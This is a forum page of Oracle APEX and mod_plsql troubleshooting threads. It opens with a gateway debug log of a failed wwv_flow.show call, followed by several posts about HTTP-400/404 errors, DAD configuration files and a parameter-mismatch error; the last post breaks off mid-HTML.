<3240796168 ms>(wppr.c,460) start working with wwv_flow.show
<3240796168 ms>(wppr.c,1164) The CALL block: len=1115, bind_count=14
declare
rc__ number;
start_time__ binary_integer;
simple_list__ owa_util.vc_arr;
complex_list__ owa_util.vc_arr;
begin
start_time__ := dbms_utility.get_time;
owa.init_cgi_env(:n__,:nm__,:v__);
htp.HTBUF_LEN := 63;
null;
null;
simple_list__(1) := 'sys.%';
simple_list__(2) := 'dbms\_%';
simple_list__(3) := 'utl\_%';
simple_list__(4) := 'owa\_%';
simple_list__(5) := 'owa.%';
simple_list__(6) := 'htp.%';
simple_list__(7) := 'htf.%';
simple_list__(8) := 'wpg_docload.%';
if ((owa_match.match_pattern('wwv_flow.show', simple_list__, complex_list__, true))) then
rc__ := 2;
else
null;
null;
wwv_flow.show(p_request=>:p_request,p_instance=>:p_instance,p_flow_id=>:p_flow_id,p_flow_step_id=>:p_flow_step_id,p_arg_names=>:p_arg_names,p_arg_values=>:p_arg_values);
if (wpg_docload.is_file_download) then
rc__ := 1;
wpg_docload.get_download_file(:doc_info);
null;
null;
null;
commit;
else
rc__ := 0;
null;
null;
null;
commit;
owa.get_page(:data__,:ndata__);
end if;
end if;
:rc__ := rc__;
:db_proc_time__ := dbms_utility.get_time - start_time__;
end;
<3240796168 ms>(wppr.c,520) Pl/sql block parsed...
<3240796168 ms>(wpdenv.c,1527) CGI Environment has 30 vars. Max name len 128, Max Value Len 128
<3240796168 ms> PLSQL_GATEWAY(14)=(6)WebDb
<3240796168 ms> GATEWAY_IVERSION(17)=(2)3
<3240796168 ms> SERVER_SOFTWARE(16)=(60)Oracle-Application-Server-10g/10.1.2.0.0 Oracle-HTTP-Server
<3240796168 ms> GATEWAY_INTERFACE(18)=(8)CGI/1.1
<3240796168 ms> SERVER_PORT(12)=(5)7777
<3240796168 ms> SERVER_NAME(12)=(22)mohawk.ventura-uk.com
<3240796168 ms> REQUEST_METHOD(15)=(5)POST
<3240796168 ms> PATH_INFO(10)=(15)/wwv_flow.show
<3240796168 ms> SCRIPT_NAME(12)=(10)/pls/apex
<3240796168 ms> REMOTE_ADDR(12)=(12)10.0.10.222
<3240796168 ms> SERVER_PROTOCOL(16)=(9)HTTP/1.1
<3240796168 ms> REQUEST_PROTOCOL(17)=(5)HTTP
<3240796168 ms> REMOTE_USER(12)=(17)APEX_PUBLIC_USER
<3240796168 ms> HTTP_CONTENT_LENGTH(20)=(4)162
<3240796168 ms> HTTP_CONTENT_TYPE(18)=(34)application/x-www-form-urlencoded
<3240796168 ms> HTTP_USER_AGENT(16)=(75)Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
<3240796168 ms> HTTP_HOST(10)=(12)mohawk:7777
<3240796168 ms> HTTP_ACCEPT(12)=(4)*/*
<3240796168 ms> HTTP_ACCEPT_ENCODING(21)=(14)gzip, deflate
<3240796168 ms> HTTP_ACCEPT_LANGUAGE(21)=(6)en-gb
<3240796168 ms> HTTP_REFERER(13)=(61)http://mohawk:7777/pls/apex/f?p=1122:1:1776222419881214:::::
<3240796168 ms> HTTP_ORACLE_ECID(17)=(36)1202314983:10.30.96.8:528620:0:63,0
<3240796168 ms> WEB_AUTHENT_PREFIX(19)=(1)
<3240796168 ms> DAD_NAME(9)=(5)apex
<3240796168 ms> DOC_ACCESS_PATH(16)=(5)docs
<3240796168 ms> DOCUMENT_TABLE(15)=(23)wwv_flow_file_objects$
<3240796168 ms> PATH_ALIAS(11)=(1)
<3240796168 ms> REQUEST_CHARSET(16)=(9)AL32UTF8
<3240796168 ms> REQUEST_IANA_CHARSET(21)=(6)UTF-8
<3240796168 ms> SCRIPT_PREFIX(14)=(5)/pls
<3240796168 ms>StrArrPosBind pos 2 Charset Id : 873
<3240796168 ms>StrArrPosBind pos 3 Charset Id : 873
<3240796168 ms>StrArrPosBind pos 11 Charset Id : 873
<3240796174 ms>Execute: ORA-06550: line 25, column 3:
PLS-00306: wrong number or types of arguments in call to 'SHOW'
ORA-06550: line 25, column 3:
PLS-00306: wrong number or types of arguments in call to 'SHOW'
ORA-06550: line 25, column 3:
PL/SQL: Statement ignored
<3240796174 ms>(wppr.c,640) Execute:declare
objnum NUMBER;
objtyp NUMBER;
prename VARCHAR2(31);
name VARCHAR(31);
subname VARCHAR(31);
dblnk VARCHAR(31);
begin
dbms_utility.name_resolve(:objname, 1, prename, name, subname,
dblnk, objtyp, objnum);
if (name is null) then
sys.wpiutl.subpparam(objnum,subname,null,prename,:2,:3,:4,:5,:6,:7);
else
sys.wpiutl.subpparam(objnum,name,subname,prename,:2,:3,:4,:5,:6,:7);
end if;
exception
when others then :5 := 1;
end;
<3240796174 ms>(wppr.c,660) 6 parameter names
<3240796174 ms>StrArrPosBind pos 2 Charset Id : 873
<3240796174 ms>StrArrPosBind pos 3 Charset Id : 873
<3240796174 ms>StrArrPosBind pos 4 Charset Id : 873
<3240796176 ms>(wppr.c,704) misdefl=0, nenamei=0
<3240796176 ms>(wppr.c,744) print list of name, types, typeflags
<3240796176 ms>(wppr.c,797) parameter name: P_REQUEST, type: VARCHAR2, typeflags: 000
<3240796176 ms>(wppr.c,797) parameter name: P_INSTANCE, type: VARCHAR2, typeflags: 000
<3240796176 ms>(wppr.c,797) parameter name: P_FLOW_ID, type: VARCHAR2, typeflags: 000
<3240796176 ms>(wppr.c,797) parameter name: P_FLOW_STEP_ID, type: VARCHAR2, typeflags: 000
<3240796176 ms>(wppr.c,759) Array graduation (1=>4, 15=>32)
<3240796176 ms>(wppr.c,797) parameter name: P_ARG_NAMES, type: FLOWS_030000.WWV_FLOW_GLOBAL.VC_ARR2, typeflags: 001
<3240796176 ms>(wppr.c,759) Array graduation (1=>4, 14=>32)
<3240796176 ms>(wppr.c,797) parameter name: P_ARG_VALUES, type: FLOWS_030000.WWV_FLOW_GLOBAL.VC_ARR2, typeflags: 001
<3240796176 ms>(wppr.c,520) Pl/sql block parsed...
<3240796176 ms>(wpdenv.c,1527) CGI Environment has 30 vars. Max name len 128, Max Value Len 128
<3240796176 ms> PLSQL_GATEWAY(14)=(6)WebDb
<3240796176 ms> GATEWAY_IVERSION(17)=(2)3
<3240796176 ms> SERVER_SOFTWARE(16)=(60)Oracle-Application-Server-10g/10.1.2.0.0 Oracle-HTTP-Server
<3240796176 ms> GATEWAY_INTERFACE(18)=(8)CGI/1.1
<3240796176 ms> SERVER_PORT(12)=(5)7777
<3240796176 ms> SERVER_NAME(12)=(22)mohawk.ventura-uk.com
<3240796176 ms> REQUEST_METHOD(15)=(5)POST
<3240796176 ms> PATH_INFO(10)=(15)/wwv_flow.show
<3240796176 ms> SCRIPT_NAME(12)=(10)/pls/apex
<3240796176 ms> REMOTE_ADDR(12)=(12)10.0.10.222
<3240796176 ms> SERVER_PROTOCOL(16)=(9)HTTP/1.1
<3240796176 ms> REQUEST_PROTOCOL(17)=(5)HTTP
<3240796176 ms> REMOTE_USER(12)=(17)APEX_PUBLIC_USER
<3240796176 ms> HTTP_CONTENT_LENGTH(20)=(4)162
<3240796176 ms> HTTP_CONTENT_TYPE(18)=(34)application/x-www-form-urlencoded
<3240796176 ms> HTTP_USER_AGENT(16)=(75)Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
<3240796176 ms> HTTP_HOST(10)=(12)mohawk:7777
<3240796176 ms> HTTP_ACCEPT(12)=(4)*/*
<3240796176 ms> HTTP_ACCEPT_ENCODING(21)=(14)gzip, deflate
<3240796176 ms> HTTP_ACCEPT_LANGUAGE(21)=(6)en-gb
<3240796176 ms> HTTP_REFERER(13)=(61)http://mohawk:7777/pls/apex/f?p=1122:1:1776222419881214:::::
<3240796176 ms> HTTP_ORACLE_ECID(17)=(36)1202314983:10.30.96.8:528620:0:63,0
<3240796176 ms> WEB_AUTHENT_PREFIX(19)=(1)
<3240796176 ms> DAD_NAME(9)=(5)apex
<3240796176 ms> DOC_ACCESS_PATH(16)=(5)docs
<3240796176 ms> DOCUMENT_TABLE(15)=(23)wwv_flow_file_objects$
<3240796176 ms> PATH_ALIAS(11)=(1)
<3240796176 ms> REQUEST_CHARSET(16)=(9)AL32UTF8
<3240796176 ms> REQUEST_IANA_CHARSET(21)=(6)UTF-8
<3240796176 ms> SCRIPT_PREFIX(14)=(5)/pls
<3240796176 ms>StrArrPosBind pos 2 Charset Id : 873
<3240796176 ms>StrArrPosBind pos 3 Charset Id : 873
<3240796176 ms>StrArrPosBind pos 8 Charset Id : 873
<3240796176 ms>StrArrPosBind pos 9 Charset Id : 873
<3240796176 ms>StrArrPosBind pos 11 Charset Id : 873
<3240796181 ms>ORA-6550 Execute ORA-06550: line 25, column 3:
PLS-00306: wrong number or types of arguments in call to 'SHOW'
ORA-06550: line 25, column 3:
PLS-00306: wrong number or types of arguments in call to 'SHOW'
ORA-06550: line 25, column 3:
PL/SQL: Statement ignored
<3240796181 ms>/pls/apex/wwv_flow.show HTTP-404 ORA-06550: line 25, column 3:
PLS-00306: wrong number or types of arguments in call to 'SHOW'
ORA-06550: line 25, column 3:
PLS-00306: wrong number or types of arguments in call to 'SHOW'
ORA-06550: line 25, column 3:
PL/SQL: Statement ignored
<3240796181 ms>(wpu.c,595) longjumping back to the beginning
<3240796181 ms>(wpu.c,458) cleaning up before longjmp
<3240796181 ms>(wpu.c,462) doing a rollback
<3240796181 ms>(wpcs.c, 77) Executed 'rollback' (rc=0)
<3240796182 ms>(wpcs.c, 77) Executed 'begin dbms_session.reset_package; end;' (rc=0)
<3240796182 ms>(wpd.c,1820) Going to close cursor
<3240796182 ms>DeinitCursor
<3240796182 ms>(wpx.c,693) Shutdown has been called
<3240796182 ms>(wpx.c,705) Going to logoff
<3240796182 ms>Logoff: Pooling this connection
<3240796182 ms>[ReqEndtime: 6/Feb/2008:16:23:03]
<3240796182 ms>[ReqExecTime: 15 ms]

Loanshark, this forum is for Oracle Portal caching questions, try posting your question in the APEX forum.
Cheers,
Mick.

Similar Messages

  • Mod_plsql: /pls/apex/wwv_flow.accept HTTP-400 Too many arguments passed in.

    Hi All ,
    I want one solution i have a report which fectches the ppt that r stored in db,If i search more results it errors out so i have reduced the results and it was working fine.Now i see it is giving the same error(as below) althorugh it was working fine by reducing results in query.Can anybody please help me in this.
    the error is
    Bad Request
    Your browser sent a request that this server could not understand.
    mod_plsql: /pls/apex/wwv_flow.accept HTTP-400 Too many arguments passed in. Got 3250 parameters. Upper limit is 2000
    Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server Server at insightapps.oraclecorp.com Port 80

    Section 1.10 of the Oracle HTTP Server mod_plsql User's Guide states the following
    The total number of name value pairs that can be passed to a PL/SQL procedure is 2000.
    mod_plsql limits the total number of parameters that can be passed to a single procedure to 2000.
    mod_plsql limits the size of a single parameter that can be passed to a procedure to 32000 bytes.
    It would be helpful to know how each of these apply in the APEX context
    Varad

  • Wwv_flow.accept HTTP-404 ORA-01031

    Hi ... I am running APEX 3.0 ...I was having trouble uploading images in my applications and to test whether it was my apps or not, I created a new workspace with the standard sample application - which gives the same error as in my apps.
    The error appears when I attempt to upload an image. The apache error log entries for this error are the following:
    [Sat May 19 12:28:07 2007] [error] [client 127.0.0.1] [ecid: 1179595687:***.168.2.127:4272:4248:1,0] mod_plsql: /stage/wwv_flow.accept HTTP-404 ORA-01031: insufficient privileges\n
    [Sat May 19 12:29:52 2007] [error] [client 192.168.2.103] [ecid: 1179595792:***.168.2:4272:3064:13,0] mod_plsql: /stage/p HTTP-404 ORA-01403: no data found\nORA-06512: at "FLOWS_030000.WWV_FLOW_FILE_MGR", line 96\nORA-06512: at "FLOWS_030000.P", line 26\nORA-06512: at line 22\n
    The forums expert assistance will be highly appreciated ...
    Thanks
    Pter

    Pierre,
    Can you show us the block of code that is failing? The error message says it's getting a 1403 in the "p" procedure. That procedure is used for downloading, not uploading.
    Scott

  • Importing app, 404 Not Found, /pls/apex/wwv_flow.accept was not found

    Hello,
    It seems like others on this forum have posted this same question, although I still can't find my solution.
    I'm trying to import an application into Apex, but I end up getting a 404 Not Found error message, with "The requested URL /pls/apex/wwv_flow.accept was not found on this server". I checked the Apache error logs and this is what I see, but can't seem to understand what I need to do:
    [Wed Oct  3 14:26:10 2007] [error] [client 147.18.232.249] [ecid: 1191435955:131.98.31.15:784:0:3056,0] mod_plsql: /pls/apex/wwv_flow.accept
    HTTP-404 ORA-00942: table or view does not exist\nLaura

    Hi Scott,
    I realized what my problem was. It was in the marvel.conf file, contents listed below. Normally we remove the two lines below in bold. When I put them back in, I was able to load my app. Thanks for tipping me off in the right general direction!
    Laura
    mod_plsql DAD Configuration File                        
    Alias /i/ /opt/oracle/product/10.2.0/db_1_apex/apex/images/
    AddType text/xml xbl
    AddType text/x-component htc
       Order deny,allow   
       PlsqlDocumentPath docs   
       AllowOverride None   
       PlsqlDocumentProcedure wwv_flow_file_manager.process_download   
       PlsqlDatabaseConnectString localhost:1521:IPF ServiceNameFormat   
       PlsqlNLSLanguage AMERICAN_AMERICA.AL32UTF8   
       PlsqlAuthenticationMode Basic   
       PlsqlMaxRequestsPerSession 1
       SetHandler pls_handler   
       PlsqlDocumentTablename wwv_flow_file_objects$   
       PlsqlDefaultPage apex    
    <b>   PlsqlDatabaseUsername APEX_PUBLIC_USER
       PlsqlDatabasePassword xxxxxx</b>
       Allow from all

  • Wwv_flow.accept HTTP-404 (htmldb 1.6)

    Hi,
    I am unable to upload any files into htmldb 1.6 on 10g (running on Linux RHEL3).
    To upload an image I perform the following steps:
    - go into the shared components section
    - click on the images link
    - click create
    - browse for the image
    - click upload
    In the Apache error file it gives the following:
    wwv_flow.accept HTTP-404 ORA-00942: table or view doews not exist
    On Metalink a FIX for this problem found in Note:301329.1:
    HTTP-404 When trying to import From a spreadsheet in Data Workshop.
    The fix was applied but I am still receiving the same error even after restarting the Oracle HTTP Server.
    Any suggestions would be greatly appreciated.
    Thanks.

    Hi Scott,
    Thanks for the quick reply. Below is the dads.conf description:
    <Location /pls/htmldb>
    SetHandler pls_handler
    Order deny,allow
    Allow from all
    AllowOverride None
    PlsqlDatabaseUsername ################
    PlsqlDatabasePassword ################
    PlsqlDatabaseConnectString ##.###.###.##:1521:dbdev
    PlsqlDefaultPage htmldb
    PlsqlDocumentTablename wwv_flow_file_objects$
    PlsqlDocumentPath docs
    PlsqlDocumentProcedure wwv_flow_file_manager.process_download
    PlsqlAuthenticationMode Basic
    PlsqlNLSLanguage     AMERICAN_AMERICA.WE8IS08859P1
    </Location>
    Thank-you for your time.

  • After 4.2.1 upgrade get:  requested URL /pls/apex/wwv_flow.accept not found

    Hi,
    Our hosted site just upgraded to 4.2.1 and I am getting:
    The requested URL /pls/apex/wwv_flow.accept was not found on this server.
    After trying to make a change on a master/detail form. I thought Apex 4.2 increased the # of fields on a master detail form so was surprised to see this error. Even when I reduce the number of columns showing on the detail part of the form which can have many rows as well, I am still getting the above error.
    Has there been any change in 4.2 that would change the behavior of a straightforward save of a multi row master detail form?
    In the past with Apex 4.0 I had to limit the columns being shown, but now I am reducing the # of columns even further and still get the error.
    UPDATE: I just removed from the report region definition several columns (which were deselected from the Report Attributes so not actually showing in the master-detail form) and now I am at least able to add rows and save changes. Again I am totally surprised that this behavior is happening when I thought 4.2 allowed for MORE page items!!
    I still cannot Delete rows from the detail section -- I get the odd message of :
    ORA-02292: integrity constraint (ENTERPRISE_SYSTEMS.RESOURCE_REQUEST_CON) violated - child record found
    But these rows have no child record!! They ARE the child records of the Master form. I had seen this behavior again related to the number of items showing on a page. Seems to me to be a bug in Apex that I had hoped would be removed with the 4.2 upgrade.
    Am I missing something!!
    PM
    Edited by: patfmnd on Dec 28, 2012 10:39 AM

    For the first problem, I'd check the alert log first, location:
    select * from v$parameter where name like '%user_dump_dest%';

  • Error starting up ApEx's Oracle HTTP server

    Hello.
    I have just configured a brand new Oracle HTTP server on a brand new ApEx database. When I try to start the server, it doesn't start and I see errors in the log files.
    dads.conf in Apache/modplsql/conf directory:
    Alias /i/ "/u01/app/oracle/product/10.2.0/http/Apache/images/"
    AddType text/xml xbl
    AddType text/x-component htc
    <Location /pls/apex>
    Order deny,allow
    PlsqlDocumentPath docs
    AllowOverride None
    PlsqlDocumentProcedure wwv_flow_file_mgr.process_download
    PlsqlDatabaseConnectString zemple:1521:orp244a.<my domain here>.com ServiceNameFormat
    PlsqlNLSLanguage AMERICAN_AMERICA.WE8ISO8859P1
    PlsqlAuthenticationMode Basic
    SetHandler pls_handler
    PlsqlDocumentTablename wwv_flow_file_objects$
    PlsqlDatabaseUsername APEX_PUBLIC_USER
    PlsqlDefaultPage apex
    PlsqlDatabasePassword <my password here>
    PlsqlRequestValidationFunction wwv_flow_epg_include_modules.authorize
    Allow from all
    </Location>
    orp244a is a 10.2.0.4 database into which ApEx has been installed per the install guide with no errors. The Oracle HTTP server is 10.2.0.1. Both run on Zemple. I have substituted the domain name and the password for APEX_PUBLIC_USER account with <my domain here> and <my password here>, respectively, for security reasons.
    When I check http://zemple.<my domain here>:7777, I get the standard Oracle HTTP Server page. But when I check http://zemple.<my domain here>:7777/pls/apex I get the "Page cannot be found" error.
    error_log in Apache/logs directory:
    [Mon Mar 16 14:50:59 2009] [notice] Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server configured -- resuming normal operations
    [Mon Mar 16 14:50:59 2009] [notice] Accept mutex: fcntl (Default: fcntl)
    [Mon Mar 16 14:51:07 2009] [error] [client 10.222.137.7] [ecid: 1237233067:10.220.17.126:21396:0:2,0] File does not exist: /u01/app/oracle/product/10.2.0/http
    /Apache/Apache/htdocs/pls
    [Mon Mar 16 14:51:55 2009] [error] [client 10.222.137.7] [ecid: 1237233115:10.220.17.126:21399:0:2,0] mod_plsql: /pls/apex/apex HTTP-404 ORA-06502: PL/SQL: nu
    meric or value error\nORA-06512: at "SYS.OWA_MATCH", line 41\nORA-06512: at line 18\n
    [Mon Mar 16 14:51:59 2009] [error] [client 10.222.137.7] [ecid: 1237233119:10.220.17.126:21399:0:4,0] mod_plsql: /pls/apex/apex HTTP-404 ORA-06502: PL/SQL: nu
    meric or value error\nORA-06512: at "SYS.OWA_MATCH", line 41\nORA-06512: at line 18\n
    Any idea what my problem might be?
    Thank You
    Boris

    The modplsql/logs directory is completely empty.
    The stop and start of the http server is clean - no errors reported.
    The main log in Apache/Apache/logs directory is not big, since it is a brand new install of the http server. Here is the complete log:
    [Mon Mar 16 13:45:38 2009] [notice] FastCGI: process manager initialized (pid 7879)
    [Mon Mar 16 13:45:39 2009] [notice] Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server configured -- resuming normal operations
    [Mon Mar 16 13:45:39 2009] [notice] Accept mutex: fcntl (Default: fcntl)
    [Mon Mar 16 14:45:06 2009] [notice] FastCGI: process manager initialized (pid 18854)
    [Mon Mar 16 14:45:07 2009] [notice] Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server configured -- resuming normal operations
    [Mon Mar 16 14:45:07 2009] [notice] Accept mutex: fcntl (Default: fcntl)
    [Mon Mar 16 14:45:56 2009] [error] [client 10.222.137.7] [ecid: 1237232756:10.220.17.126:18862:0:1,0] mod_plsql: /pls/apex/apex_admin HTTP-404 ORA-06502: PL/S
    QL: numeric or value error\nORA-06512: at "SYS.OWA_MATCH", line 41\nORA-06512: at line 18\n
    [Mon Mar 16 14:46:32 2009] [error] [client 10.222.137.7] [ecid: 1237232792:10.220.17.126:18866:0:1,0] File does not exist: /u01/app/oracle/product/10.2.0/http
    /Apache/Apache/htdocs/pls/
    [Mon Mar 16 14:46:38 2009] [error] [client 10.222.137.7] [ecid: 1237232798:10.220.17.126:18860:0:2,0] File does not exist: /u01/app/oracle/product/10.2.0/http
    /Apache/Apache/htdocs/pls/
    [Mon Mar 16 14:46:45 2009] [error] [client 10.222.137.7] [ecid: 1237232805:10.220.17.126:18866:0:2,0] File does not exist: /u01/app/oracle/product/10.2.0/http
    /Apache/Apache/htdocs/pls/
    [Mon Mar 16 14:50:58 2009] [notice] FastCGI: process manager initialized (pid 21392)
    [Mon Mar 16 14:50:59 2009] [notice] Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server configured -- resuming normal operations
    [Mon Mar 16 14:50:59 2009] [notice] Accept mutex: fcntl (Default: fcntl)
    [Mon Mar 16 14:51:07 2009] [error] [client 10.222.137.7] [ecid: 1237233067:10.220.17.126:21396:0:2,0] File does not exist: /u01/app/oracle/product/10.2.0/http
    /Apache/Apache/htdocs/pls
    [Mon Mar 16 14:51:55 2009] [error] [client 10.222.137.7] [ecid: 1237233115:10.220.17.126:21399:0:2,0] mod_plsql: /pls/apex/apex HTTP-404 ORA-06502: PL/SQL: nu
    meric or value error\nORA-06512: at "SYS.OWA_MATCH", line 41\nORA-06512: at line 18\n
    [Mon Mar 16 14:51:59 2009] [error] [client 10.222.137.7] [ecid: 1237233119:10.220.17.126:21399:0:4,0] mod_plsql: /pls/apex/apex HTTP-404 ORA-06502: PL/SQL: nu
    meric or value error\nORA-06512: at "SYS.OWA_MATCH", line 41\nORA-06512: at line 18\n
    [Mon Mar 16 15:01:46 2009] [error] [client 10.222.137.7] [ecid: 1237233706:10.220.17.126:21399:0:9,0] File does not exist: /u01/app/oracle/product/10.2.0/http
    /Apache/Apache/htdocs/pls/htmldb
    [Mon Mar 16 15:01:53 2009] [error] [client 10.222.137.7] [ecid: 1237233713:10.220.17.126:21399:0:11,0] mod_plsql: /pls/apex/apex HTTP-404 ORA-06502: PL/SQL: n
    umeric or value error\nORA-06512: at "SYS.OWA_MATCH", line 41\nORA-06512: at line 18\n
    Thank You
    Boris

  • Requested URL /pls/apex/wwv_flow.accept was not found on this server

    Hi there
    Since yesterday we have had troubles with apex production our environment is Apex 4.1, Oracle 11gR2 over windows server 2008, please help me to solve this issue,
    it happend in the login page and when submit the authentication
    we don have any procedure or form named CSRT (sincerly i don't know what is it)
    Sat, 02 Jun 2012 00:46:58 GMT
    wwv_flow.accept: SIGNATURE (parameter names) MISMATCH
    VARIABLES IN FORM NOT IN PROCEDURE: CSRT
    NON-DEFAULT VARIABLES IN PROCEDURE NOT IN FORM:
    DAD name: apex
    PROCEDURE : wwv_flow.accept
    URL : http://<servername>/pls/apex/wwv_flow.accept
    PARAMETERS :
    ===========
    P_FLOW_ID:
    10000
    P_FLOW_STEP_ID:
    101
    P_INSTANCE:
    1188591586206701
    P_PAGE_SUBMISSION_ID:
    1718810680562501
    P_REQUEST:
    P101_PASSWORD
    CSRT:
    4970566970745194725
    P_ARG_NAMES:
    3865609856762007
    3865732602762007
    P_T01:
    administrator
    P_T02:
    passsss
    P_MD5_CHECKSUM:
    P_PAGE_CHECKSUM:
    A98EB992B8BC89BE54BB1A8BAC4F05FF
    ENVIRONMENT:
    ============
    PLSQL_GATEWAY=WebDb
    GATEWAY_IVERSION=3
    SERVER_SOFTWARE=Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
    GATEWAY_INTERFACE=CGI/1.1
    SERVER_PORT=80
    SERVER_NAME=servername
    REQUEST_METHOD=POST
    QUERY_STRING=
    PATH_INFO=/wwv_flow.accept
    SCRIPT_NAME=/pls/apex
    REMOTE_HOST=
    REMOTE_ADDR=148.204.103.109
    SERVER_PROTOCOL=HTTP/1.1
    REQUEST_PROTOCOL=HTTP
    REMOTE_USER=APEX_PUBLIC_USER
    ORACLE_SSO_USER=
    OSSO_IDLE_TIMEOUT_EXCEEDED=
    OSSO_USER_GUID=
    HTTP_CONTENT_LENGTH=312
    HTTP_CONTENT_TYPE=application/x-www-form-urlencoded
    HTTP_USER_AGENT=Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
    HTTP_HOST=www.ebecas.ipn.mx
    HTTP_ACCEPT=text/html, application/xhtml+xml, */*
    HTTP_ACCEPT_ENCODING=
    HTTP_ACCEPT_LANGUAGE=es-MX
    HTTP_ACCEPT_CHARSET=
    HTTP_COOKIE=WWV_CUSTOM-F_1280503233500189_10000=3CAE234CC12CBF34CAC4A802F7E56419; WWV_CUSTOM-F_3230615565651498_2000=85A8907E234374F9065F2AD170F7B446; PUBLIC_WWV_CUSTOM-F_3230615565651498_2000=2708019786394201; WWV_CUSTOM-F_3230615565651498_2400=038325581CE3C913839B01B86444E24E; PUBLIC_WWV_CUSTOM-F_3230615565651498_2400=609137910649001; WWV_CUSTOM-F_3230615565651498_308=0437267FCCB0A166B36DCF5BA56261EB; PUBLIC_WWV_CUSTOM-F_3230615565651498_308=30428853764001; WWV_CUSTOM-F_1280503233500189_777=5B01254A5CD4D740F4758DC9EC163928; PUBLIC_WWV_CUSTOM-F_1280503233500189_777=689694810635801; PUBLIC_WWV_CUSTOM-F_1280503233500189_10000=1649958529159401; WWV_CUSTOM-F_1280503233500189_100=5932332699F7E216AE8D86FD62D69B5A; ORA_WWV_USER_63131075338127=AB757F79A601B064B269432C60D984AC; TS5d40a3=ccd424a738458568ec242aa1123ddd1e596ad0e9e522c57a4fc7aaf6; ORA_WWV_USER_71418318778246=0A42816D6E86C44D1731B394A8802013; __utmc=8977645; TS5af0a4=8ea79f2c523309c506a0a48047fd743f596ad0e9e522c57a4fc962d0; TS5af0a4_28=2a1d0a2d897dca30ab56d0cb72789138596ad0e9e522c57a0000000000000000004fc7c5b78414789acdf34f97; TS5af0a4_77=8572_0e073dd415ef2d41_rsb_0_rs_http%3A%2F%2Fwww.ebecas.ipn.mx%2Fportal%2Ff%3Fp%3D10000%3ABIENVENIDO_rs_1
    HTTP_IF_MODIFIED_SINCE=
    HTTP_REFERER=http://<servername>/pls/apex/f?p=10000:101:1188591586206701
    HTTP_SOAPACTION=
    HTTP_ORACLE_ECID=6305641793926,1
    HTTP_ORACLE_CACHE_VERSION=10.1.2
    HTTP_AUTHORIZATION=
    WEB_AUTHENT_PREFIX=
    DAD_NAME=apex
    DOC_ACCESS_PATH=docs
    DOCUMENT_TABLE=wwv_flow_file_objects$
    PATH_ALIAS=
    REQUEST_CHARSET=AL32UTF8
    REQUEST_IANA_CHARSET=UTF-8
    SCRIPT_PREFIX=/pls
    HTTP_IF_MATCH=
    HTTP_CACHE_CONTROL=
    SOAP_BODY=
    HTTP_X_ORACLE_DEVICE_CLASS=
    HTTP_X_ORACLE_DEVICE_ORIENTATION=
    HTTP_X_ORACLE_DEVICE_MAXDOCSIZE=
    HTTP_X_ORACLE_DEVICE=
    HTTP_X_ORACLE_ORIG_ACCEPT=
    HTTP_X_ORACLE_ORIG_USER_AGENT=
    HTTP_X_ORACLE_USER_LOCALE=
    HTTP_X_ORACLE_USER_NAME=
    HTTP_X_ORACLE_USER_DISPLAYNAME=
    HTTP_X_ORACLE_USER_USERKIND=
    HTTP_X_ORACLE_USER_AUTHKIND=
    HTTP_X_ORACLE_USER_DEVICEID=
    HTTP_X_ORACLE_USER_LOCATION_ADDRESSLINE1=
    HTTP_X_ORACLE_USER_LOCATION_ADDRESSLINE2=
    HTTP_X_ORACLE_USER_LOCATION_ADDRESSLASTLINE=
    HTTP_X_ORACLE_USER_LOCATION_BLOCK=
    HTTP_X_ORACLE_USER_LOCATION_CITY=
    HTTP_X_ORACLE_USER_LOCATION_COMPANYNAME=
    HTTP_X_ORACLE_USER_LOCATION_COUNTY=
    HTTP_X_ORACLE_USER_LOCATION_STATE=
    HTTP_X_ORACLE_USER_LOCATION_POSTALCODE=
    HTTP_X_ORACLE_USER_LOCATION_POSTALCODEEXT=
    HTTP_X_ORACLE_USER_LOCATION_COUNTRY=
    HTTP_X_ORACLE_USER_LOCATION_TYPE=
    HTTP_X_ORACLE_USER_LOCATION_X=
    HTTP_X_ORACLE_USER_LOCATION_Y=
    HTTP_X_ORACLE_SERVICE_HOME_URL=
    HTTP_X_ORACLE_SERVICE_PARENT_URL=
    HTTP_X_ORACLE_HOME_URL=
    HTTP_X_ORACLE_MODULE_CALLBACK_URL=
    HTTP_X_ORACLE_MODULE_CALLBACK_LABEL=
    HTTP_X_ORACLE_CACHE_USER=
    HTTP_X_ORACLE_CACHE_SUBID=
    HTTP_X_ORACLE_CACHE_AUTH=
    HTTP_X_ORACLE_CACHE_DEVICE=
    HTTP_X_ORACLE_CACHE_LANG=
    HTTP_X_ORACLE_CACHE_ENCRYPT=
    HTTP_X_ORACLE_ASSERT_USER=

    Tx for help me folks!
    Let me explain
    We have tw domains (a and b) that access to a same database (where the app is)
    i configured the dads.conf to access the database in both domains, from domain a
    i can't acces the app, it send the error before wrote, and from domain b i can access
    without trouble my app, a search the HTML source from my page in both domains and
    notice that in domain a the source is the next (just a bit)
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html lang="es-mx" xmlns="http://www.w3.org/1999/xhtml" xmlns:htmldb="http://htmldb.oracle.com" xmlns:apex="http://apex.oracle.com">
    <head><script language="JavaScript">var pn = "CSRT"; var pv = '3921513832723665401';
